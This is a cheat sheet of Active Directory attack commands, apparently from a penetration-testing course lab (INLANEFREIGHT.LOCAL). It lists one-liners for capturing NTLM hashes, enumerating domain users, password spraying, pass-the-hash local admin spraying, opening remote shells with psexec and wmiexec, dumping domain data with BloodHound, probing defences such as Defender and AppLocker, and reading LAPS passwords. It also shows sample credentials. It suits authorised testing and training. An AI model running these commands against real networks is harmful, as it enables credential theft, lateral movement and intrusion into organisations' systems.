Get a list of all devices that are up
nmap -sn [IP]
Capture all network packets on an interface
sudo tcpdump -i [Interface]
Passively listens for Windows name resolution traffic and logs potential NTLM(v1/v2) hashes.
sudo responder -I [Interface] -A
Enumerate users in a domain with SMB NULL (First resort)
crackmapexec smb 172.16.5.5 --users
Enumerate users in a domain with SMB NULL
enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
Enumerate users in a domain with LDAP anonymous
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
Brute force a list of potential users in the AD (jsmith.txt is a good wordlist)
kerbrute userenum -d [DOMAIN] --dc [IP] jsmith.txt -o valid_ad_users
Enumerates users, groups, shares, and host info on Windows/AD hosts (Run both with and without credentials)
enum4linux -a -u [USERNAME] -p [PASSWORD] [IP]
Pull the password policy from an AD (With credentials)
crackmapexec smb [IP] -u [USERNAME] -p [PASSWORD] --pass-pol
Enumerate password policy with LDAP
ldapsearch -h [IP] -x -b "DC=[DOMAIN],DC=[DOMAIN EXT]" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
List all domain users (In PowerShell - Requires SYSTEM)
Import-Module .\PowerView.ps1
Get-NetUser
One-liner password spray [rpcclient] (Requires a file with users named valid_users.txt)
for u in $(cat valid_users.txt); do rpcclient -U "$u%[PASSWORD]" -c "getusername;quit" [IP] | grep Authority; done
One-liner password spray [Kerbrute] (Requires a file with users named valid_users.txt)
kerbrute passwordspray -d [DOMAIN] --dc [IP] valid_users.txt [PASSWORD]
One-liner password spray [CrackMapExec] (Requires a file with users named valid_users.txt)
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
Local admin spraying (For password reuse across local admin accounts)
sudo crackmapexec smb --local-auth [IP]/[SUBNET] -u administrator -H [HASH] | grep +
Using DomainPasswordSpray for password spraying [Windows] (Requires the host to be joined to the domain)
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue
or
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList [USERLIST] -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue
Locate the Domain Controller via DNS
nslookup -type=SRV _ldap._tcp.dc._msdcs.domain.local
Locate all DCs in the domain with their IPs or hostnames
nltest /dclist:domain.local
Returns the DC you are currently authenticated with
echo %logonserver%
NMAP scan to find DC in a given subnet (Less reliable than the others)
nmap -p 88,389,445 -sV [IP]/[SUBNET]
Create a shell on a given host (MUST have admin creds for that host)
psexec.py [DOMAIN]/[USER]:'[Password]'@[IP]
Create a shell on a given host (MUST have admin creds for that host).
Stealthier, as no files are uploaded, and you get an Admin shell rather than SYSTEM
wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5
Queries for all members of the Domain Admins group
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da
Queries for all members of the Privileged Users group
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU
Extracts all data (user sessions, users, groups, object properties, etc.) from a DC
sudo bloodhound-python -u '[USERNAME]' -p '[PASSWORD]' -ns [DC IP] -d [DC] -c all
Enumerating Security Controls
Checking if Windows Defender is active
Get-MpComputerStatus
Check the AppLocker whitelist for blocked executables
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Check whether you are in Constrained Language Mode in PowerShell
$ExecutionContext.SessionState.LanguageMode
Finding which groups have delegated permissions to read LAPS passwords (Anti lateral movement)
Link: LAPS Toolkit
Find-LAPSDelegatedGroups
Finding which groups have all permissions to read LAPS passwords (Anti lateral movement)
Link: LAPS Toolkit
Find-AdmPwdExtendedRights
Returns a list of computers with LAPS enabled (and their passwords if the user has permission)
Get-LAPSComputers
Enumerate users on a Domain Controller
sudo crackmapexec smb [DC IP] -u [USERNAME] -p [PASSWORD] --users
Enumerate groups on a Domain Controller
sudo crackmapexec smb [DC IP] -u [USERNAME] -p [PASSWORD] --groups
Enumerate logged on users on a host
sudo crackmapexec smb [HOST IP] -u [USERNAME] -p [PASSWORD] --loggedon-users
Lists all readable files in a given share
sudo crackmapexec smb [IP] -u [USERNAME] -p [PASSWORD] -M spider_plus --share '[SHARE NAME]'
Results will be written to /tmp/cme_spider_plus/<ip of host>